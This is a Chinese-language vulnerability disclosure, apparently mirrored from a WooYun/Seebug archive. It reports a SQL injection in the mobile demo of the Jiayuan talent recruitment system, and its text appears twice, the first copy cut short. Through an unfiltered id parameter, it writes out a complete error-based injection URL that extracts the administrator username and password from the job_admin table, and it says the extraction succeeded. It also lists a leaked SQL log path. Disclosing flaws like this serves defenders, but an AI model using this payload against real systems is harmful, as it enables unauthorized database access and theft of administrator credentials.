VULHUB ™

### 简要描述： 官网DEMO测试 ### 详细说明： 黑盒发现 嘉缘人才系统触屏版demo: ``` http:/m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 ``` 其中id没有过滤 [<img src="https://images.seebug.org/upload/201503/13174923ab5193122f31b4e654e5a279fb3b38c0.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13174923ab5193122f31b4e654e5a279fb3b38c0.png) 其中mysql报错，根据 [WooYun: 嘉缘人才系统最新版sql注入(直接出数据)](http://www.wooyun.org/bugs/wooyun-2015-0100830) 获得日志文件路径为 http://m.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt 构造如下exp ``` http://m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 %0aand%0a@`'`%0aand%0a(SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(a_user,0x27,a_pass)) FROM job_admin limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)%23 ``` 成功爆出管理员密码 [<img src="https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png" alt="8.png" width="600"...

### 简要描述： 官网DEMO测试 ### 详细说明： 黑盒发现 嘉缘人才系统触屏版demo: ``` http:/m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 ``` 其中id没有过滤 [<img src="https://images.seebug.org/upload/201503/13174923ab5193122f31b4e654e5a279fb3b38c0.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13174923ab5193122f31b4e654e5a279fb3b38c0.png) 其中mysql报错，根据 [WooYun: 嘉缘人才系统最新版sql注入(直接出数据)](http://www.wooyun.org/bugs/wooyun-2015-0100830) 获得日志文件路径为 http://m.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt 构造如下exp ``` http://m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 %0aand%0a@`'`%0aand%0a(SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(a_user,0x27,a_pass)) FROM job_admin limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)%23 ``` 成功爆出管理员密码 [<img src="https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png)